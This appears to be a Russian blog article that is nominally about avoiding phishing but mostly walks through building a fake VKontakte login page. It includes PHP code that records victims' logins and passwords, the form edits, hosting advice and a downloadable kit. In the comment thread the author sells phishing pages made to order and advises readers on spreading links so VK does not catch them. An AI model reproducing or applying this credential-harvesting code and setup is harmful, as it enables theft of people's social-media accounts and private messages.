Как не попасться на фишинговый сайт?
В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.
Что такое фишинг?
Вообще слово fishing переводится как рыбалка. Фишинг – это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.
Будьте внимательными
Как вам могут подсунуть такой сайт, есть пару примеров.
- На любом ресурсе может быть ссылка, в которой говорится: “добавь меня в друзья и получи за это 10 голосов вконтакте”. Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
- Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)
И еще куча вариантов, как можно заманить жертву на такой вот сайт.
Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.
Создание фишинг сайта
Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.
И так приведу пример создания фишингового сайта для социальной сети вконтакте.
Открываем любой браузер, заходим по адресу vk.com,
жмем файл => сохранить как =>
Имя файла: index.html
Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.
Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php
Открываем блокнот и вставляем туда этот код.
<?
$Login = $_POST[‘zabor’]; // Логин жертвы
$Pass = $_POST[‘zena’]; // Пароль жертвы
$log = fopen(‘ups.php’,’a+’); //тут будут лежать пароли жертв
fwrite($log,'<br> $Login:$Pass \n’); //производим запись в ups.php
fclose($log); //закрывает ups.php
echo ‘<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>’; // перенаправляем жертву на http://vk.com
?>
Закрываем и сохраняем как icq.php
Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form жмем enter.
Он найдет строчку:
<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”https://login.vk.com/?act=login” method=”POST”>
Меняем её на это:
<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”icq.php” method=”POST”>
Дальше, смотрим чуть ниже и находим строчку:
<INPUT name=”email” id=”quick_email” onfocus=”show’quick_expire’)” type=”text”>
Меняем на это:
<INPUT name=”zabor” id=”quick_email” onfocus=”show(‘quick_expire’)”type=”text”>
Смотрим еще чуть ниже и находим строчку:
<INPUT name=”pass” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>
Меняем на это:
<INPUT name=”zena” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>
Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.
<DIV class=”button_blue button_wide”><BUTTON id=”quick_login_button”>Войти</BUTTON></form></DIV>
Сохраняем index.html, и у вас в итоге получилось два файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Вот этим https://beget.com можно месяц бесплатно пользоваться, можно купить на месяц, всего 150 рублей. Я думаю, вы умеете это делать, если нет, задайте вопрос в комментариях.
Когда жертва зайдет на вашу страничку фишинговую, введет «логин» и «пароль», у вас создаться на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.
Рассказ о том как залить все это дело на хостинг
Вывод
В этой статье вы узнали, как себя обезопасить и не попасться на фишинговый сайт. Как создать фишинговый сайт. Скачать готовый, фишинг для вконтакта, можно ниже, для ознакомительных целей.
Скачать готовый фишинговый сайт для вконтакте.
Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе: https://vk.com/27sysday
- Вышла новая статья про фишинг в одноклассниках.
- Вышла новая статья про фишинг в инстаграм.
В связи с большим количеством обращений, решил создать услугу по настройке.
Что понадобится
- Вам нужно зарегистрироваться https://beget.com
- Связать со мной в скайпе spbskull.
- Сказать мне логин и пароль.
- Пополнить баланс телефона на 1500 рублей (тел. скажу в скайпе).
- Через час после оплаты, получите готовое решение.
Как с вами связаться?
Читайте статью, в самом конце
А как посмотреть пароль и логин, который ввёл человек на моём сайте?
возникла проблема на 2 шаге, не получается сохранить сайт вк с картинками, получается лишь без них(
Что то делаете не так, в поле тип файла выбираете (веб страница полность…)
добрый день,а можно связаться с вами по личному вопросу.Интересует фишинг биржи
можно, пишите в скайп, все контакты в статье.
пробовал сделал под mail.aol.com, криво выходит, что-то не так с формой. кто то может дать совет именно по этому сайту? может там какая то хитрость в коде самой страницы, я так сяк вертел, ничего не получается
mail.aol.com получилось сделать. Все как в статье. Пробуйте сами, где-то вы ошиблись. Если не получится, то пишите в скайп, что указан в статье, помогу за $$$.
Я всё делал как надо (даже с другом переделывали 10 раз) но почему-то на втором или третьем шаге где нужно найти строчку с “<form" он не находит что делать???
(если что пишет "не найдено")
Не понимаю где брать строчку
какую?
А куда должен приходить пароль и логин?
Статью прочтите внимательней. ups.php
при попытке скинуть сайт фишинг, вк может заморозить страницу, что если скинуть ссылку с сайтом фишинга например в ватсап. чтобы вк не блокировал, все получится ?
нужно пробывать, а вообще статья о том как не попасться на фишинговый сайт =)
если готовый взял где пароль и логин взять ?
$Login = $_POST[zabor]; // Логин жертвы
$Pass = $_POST[‘zena’]; // Пароль жертвы
я немного не понял. слова zabor и zena надо писать в кавычках или нет?
Нужно ставить кавычки
заплачу за все это дело нужно сломать страницу в вк. кому куда писать /связь?
В конце статьи написано, что нужно и, что получите, и куда написать…
Сколько?
Бля щас вк поставили защиту от фишинга и по этому ничего не выйдет вас предупридят о фишинге
че это вдруг, если вы заходите на стороний ресурс и там же вводите логин и пароль, понятное дело что ссылку нужно давать не через ВК а допустим через вацап.
Актуально с новой версией вк?
принцип тот же
Сайт сделал большое спасибо
как сохранить в файл ? не понял даже первого шага…
значит это не ваше
Антон, как с вами связаться? В вк написал, но вы в него не заходите.
захожу, но редко лучше писать в скайп
Меня на моем хостинге попросили убрать фишинговый сайт. А на том, который Вы рекомендуете, так не сделают?
Пока все хорошо
меня еще не попросили за год, не палите его
Админ а ты в ВК есть дай мне свой Id Адрес я тут кое что не понимаю нужно поговорить
ищи на сайте, все контакты есть
плез сними лучше видео я пытаюсь сделать но не понимаю
А ” одноклассников” можно?
тот же самый принцип
Все по другому не могу нечего сделать помогите что у вас за {windows}
это первое
2)-лучше ролик выложи как это все делаешь что бы понятнее было
3)- Пиши все подробно желательно с картинками что бы было понятнее
семерка у меня стояла ТОГДА
нет строчки FORM
Ну смотрите лучше, я смотрю у меня есть, а вы смотрите у вас нет
в блокноте не может найти <from
что делать???
Только что проверил, все он находит, возможно вы что-то сделали не так, попробуйте снова все сделать с нуля.
у Вас написано from а надо form
хочу заказать фишинг.это можно у вас?
можно
Из-за чего в файле где должны сохранять пароли, сохраняется только двоеточие типа : ?
Права на запись дали?
Извините за такой вопрос, но как залить эти файлы на хостинг???
Добавил видео в статью.
У меня есть готовый фейк который вы можете скачать и подсунуть его друзьям
можешь дать?)
Будет ли обновление, т.к. сайт вк изменился?
А надо опрос провести, требуется ли вообще это кому-то кроме вас.
Да,думаю будет очень полезно,обновите пожалуйста
Друг не надо так )) Тебя за это могут хлопнуть.
Нарушаешь пару законов.
1) Не законное копирование и изменение материалов сайта. С целью продажи.
2) Соучастие в хищении данных пользователя. А представь синий кит угнать захотел ак школьника , ты им помог , школьник руки на себя наложил, в итоге оба уехали на 8 лет.
3) Доход не обложенный налогами. За то что зарабатываешь у нас в стране надо платить.
А так статья норм )) Знакомый скинул оценить.
давайте проведем опрос? сколько вам не жалко потратить денег на такую услугу, по созданию сайта?
А можно создать страницу мне фишинг яб те заплатил мне прост нада взломать вк
можно
Можете сделать фишинговый сайт на заказ?
Можно
напишите свою почту хочу заказать
В ВК ПИШИТЕ
услуга сколько стойт
1500
При попытке зайти на сайт всплывает сообщение, что он не прилинкован. Хотя я проверял на beget, что линк стоит. Как можно открыть сайт?
это лучше в ТП написать им
Здравствуйте!Простите пожалуйста за тупой вопрос,я создал хостинг,как теперь залить и что собственно из 3 компонентов заливать??
При вводе данных(логина и пароля) в документ приходит ВСЕГДА вот ето
вв:вв
5555555:7777777777
Что не так!?
Права на файил посмотрите
почему у меня не находит строчку <FORM ?
Попробуйте сделать все снова
Есть видео урок?
могу помочь
Да тут же и так все понятно, если будет много просьб сделаю.